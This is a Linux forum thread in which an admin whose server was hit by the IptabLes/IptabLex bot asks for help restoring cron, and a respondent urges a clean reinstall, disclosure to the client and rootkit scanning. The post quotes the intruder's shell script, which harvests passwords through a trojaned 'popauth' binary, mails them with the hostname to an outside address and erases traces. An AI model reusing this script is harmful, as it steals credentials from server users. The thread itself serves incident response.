SSH Hack - IptabLes & IptabLex
 

My server was recently attached with a bot here is a file left behind.

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test #This part, the output to test, they were able to uncover all users passwords including "roots"
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail deathface2007@yahoo.com -s "$(hostname -f)" < test #Left his email address behind
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A


I was able to lock down ssh in /etc/ssh/sshd_config, and remove and kill of the processes and files from the hacker

But cron is not working now:

# service crond restart
Stopping crond: 0G[;31mFAILED;39m]
Starting crond: execvp: No such file or directory
0G[;31mFAILED;39m]

I tired re-loading rpm's but it still will not run. The hacker seems to have done something to kill cron.

Any Idea's of what i can do?

Also, is there a way to remove cron all together so I can reload it altogether?

Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?

My customer, runs his entire business on this server, so I am unable to just "Cut my losses and do a clean install"

---------- Post added 06-09-14 at 08:01 AM ----------

Do you have any ideas for me on getting Cron working?

First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords of private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.

Thanks for trying to help, but I found another online form that is helping to solving my problem.

I doubt it.

I'm sure you have.


For anyone else: should you want to check then, due to http://rkhunter.cvs.sourceforge.net/....507&r2=1.508& and http://rkhunter.cvs.sourceforge.net/....1&view=markup, you best get Rootkit Hunter from CVS until released officially.